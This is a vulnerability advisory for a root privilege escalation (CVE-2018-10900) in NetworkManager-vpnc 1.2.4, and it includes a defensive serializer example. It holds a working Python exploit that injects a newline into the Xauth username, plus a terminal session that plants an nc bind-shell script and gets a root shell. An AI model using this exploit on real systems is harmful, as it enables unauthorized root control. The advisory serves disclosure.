Network Manager VPNC 1.2.4 Privilege Escalation

Packet Storm ID: PACKETSTORM:148657
Published: Jul 23, 2018
Author: Denis Andzakovic
Source: packetstormsecurity.com
EPSS: 0.004 (percentile 72.5%)

Network Manager VPNC - Privilege Escalation (CVE-2018-10900)  
  
Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc  
Date Released: 21/07/2018  
CVE: CVE-2018-10900  
Author: Denis Andzakovic  
Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc  
Affected Software: Network Manager VPNC <= 1.2.4  
  
--[ Description  
The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A newline character can be used to inject a Password helper directive into the configuration data passed to vpnc, allowing an attacker to execute arbitrary commands as root.  
  
--[ Privilege Escalation  
  
When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN as "Key value" lines. Because values are written verbatim, injecting a \n character into a configuration parameter lets an attacker coerce Network Manager into setting the Password helper option to an attacker-controlled executable file.  
  
The following Python script creates a VPNC connection profile that will execute the /tmp/test file when the connection is brought up. The newline character is injected into the Xauth username parameter.  
  
import dbus

# Connection profile for the NetworkManager-vpnc plugin. The newline in
# 'Xauth username' makes "Password helper /tmp/test" come out as its own
# directive in the configuration that vpnc reads on STDIN.
con = {
    'vpn': {
        'service-type': 'org.freedesktop.NetworkManager.vpnc',
        'data': {
            'IKE DH Group': 'dh2',
            'IPSec ID': 'testgroup',
            'IPSec gateway': 'gateway',
            'IPSec secret-flags': '4',
            'Local Port': '0',
            'NAT Traversal Mode': 'natt',
            'Perfect Forward Secrecy': 'server',
            'Vendor': 'cisco',
            'Xauth password-flags': '4',
            'Xauth username': "username\nPassword helper /tmp/test",
            'ipsec-secret-type': 'unused',
            'xauth-password-type': 'unused'
        }
    },
    'connection': {
        'type': 'vpn',
        'id': 'vpnc_test',
    },
    'ipv4': {'method': 'auto'},
    'ipv6': {'method': 'auto'}
}

# Register the profile through NetworkManager's Settings interface on the system bus.
bus = dbus.SystemBus()
proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings")
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
settings.AddConnection(con)
  
The above results in the following configuration being passed to the vpnc process when the connection is initialized:   
  
Debug 0  
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950 --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4  
Cisco UDP Encapsulation Port 0  
Local Port 0  
IKE DH Group dh2  
Perfect Forward Secrecy server  
Xauth username username  
Password helper /tmp/test  
IPSec gateway gateway  
IPSec ID testgroup  
Vendor cisco  
NAT Traversal Mode natt  
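The configuration dump above is the whole story: each entry of the D-Bus 'data' dictionary becomes one "Key value" line, so a value containing \n produces two directives. As an added example (not code from the advisory or from the NetworkManager-vpnc project), the following Python models that serialization, shows where the injected directive lands, and applies the check a hardened writer needs: any value carrying a control character is refused before it reaches vpnc. The function names, the set of NM-internal keys that are skipped, and the control-character policy are assumptions for illustration; the sample 'data' dictionary is the one from the advisory.

```python
import re

# Constructed sample: the 'data' dictionary from the advisory's script.
SAMPLE_DATA = {
    'IKE DH Group': 'dh2',
    'IPSec ID': 'testgroup',
    'IPSec gateway': 'gateway',
    'IPSec secret-flags': '4',
    'Local Port': '0',
    'NAT Traversal Mode': 'natt',
    'Perfect Forward Secrecy': 'server',
    'Vendor': 'cisco',
    'Xauth password-flags': '4',
    'Xauth username': "username\nPassword helper /tmp/test",
    'ipsec-secret-type': 'unused',
    'xauth-password-type': 'unused',
}

# Assumption: these keys are consumed by NetworkManager itself and never
# written to vpnc (they do not appear in the advisory's config dump).
NM_INTERNAL_KEYS = {
    'IPSec secret-flags', 'Xauth password-flags',
    'ipsec-secret-type', 'xauth-password-type',
}

# Any ASCII control character (\n and \r included) ends or corrupts the
# current "Key value" line, so none of them belong in a key or a value.
CONTROL_CHARS = re.compile(r'[\x00-\x1f\x7f]')


def serialize_vpnc_config(data, strict=True):
    """Render NM 'data' as the 'Key value' text vpnc reads on STDIN.

    strict=False models the vulnerable behaviour: values are copied verbatim,
    so an embedded newline starts a new directive.
    strict=True refuses such values instead of writing them.
    """
    lines = []
    for key, value in data.items():
        if key in NM_INTERNAL_KEYS:
            continue
        if strict and (CONTROL_CHARS.search(key) or CONTROL_CHARS.search(value)):
            raise ValueError(f"control character in vpnc option {key!r}")
        lines.append(f"{key} {value}")
    return "\n".join(lines) + "\n"


def injected_directives(data):
    """Audit helper: return the extra lines a profile would smuggle into the
    vpnc configuration, i.e. everything after a newline inside a value."""
    found = []
    for value in data.values():
        found.extend(value.split("\n")[1:])
    return found


def rejects_profile(data):
    """True when the strict serializer refuses the profile."""
    try:
        serialize_vpnc_config(data, strict=True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Vulnerable rendering: the smuggled directive is a line of its own.
    print(serialize_vpnc_config(SAMPLE_DATA, strict=False))
    print("smuggled:", injected_directives(SAMPLE_DATA))
    print("strict writer rejects profile:", rejects_profile(SAMPLE_DATA))
```

Run against the advisory's profile, the non-strict rendering contains the line "Password helper /tmp/test" exactly as in the dump above, the audit helper reports that line as smuggled, and the strict writer raises instead of writing anything. The same control-character check is the right place to stop carriage returns and NUL bytes as well, not just \n, since vpnc's line-oriented parser treats them no more kindly.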
  
The following terminal session shows the complete privilege escalation attack.  
  
doi@ubuntu:~$ cat << EOF > /tmp/test  
> #!/bin/bash  
> mkfifo pipe  
> nc -k -l -p 8080 < pipe | /bin/bash > pipe  
> EOF  
doi@ubuntu:~$ python vpnc_privesc.py  
doi@ubuntu:~$ nmcli connection  
NAME UUID TYPE DEVICE  
Wired connection 1 a8b178fd-8cbc-3e15-aa9e-d52982215d98 ethernet ens3  
vpnc_test 233101cb-f786-44ed-9e4f-662f1a519429 vpn ens3  
doi@ubuntu:~$ nmcli connection up vpnc_test  
  
^Z  
[1]+ Stopped nmcli connection up vpnc_test  
doi@ubuntu:~$ nc -vv 127.0.0.1 8080  
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!  
id  
uid=0(root) gid=0(root) groups=0(root)  
  
--[ Timeline  
  
11/07/2018 - Advisory sent to [email protected]   
13/07/2018 - Acknowledgement from Gnome security   
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day   
21/07/2018 - Network Manager VPNC 1.2.6 released  
21/07/2018 - Advisory released  
  
--[ About Pulse Security  
Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services.  
  
W: https://pulsesecurity.co.nz  
E: info at pulsesecurity.co.nz  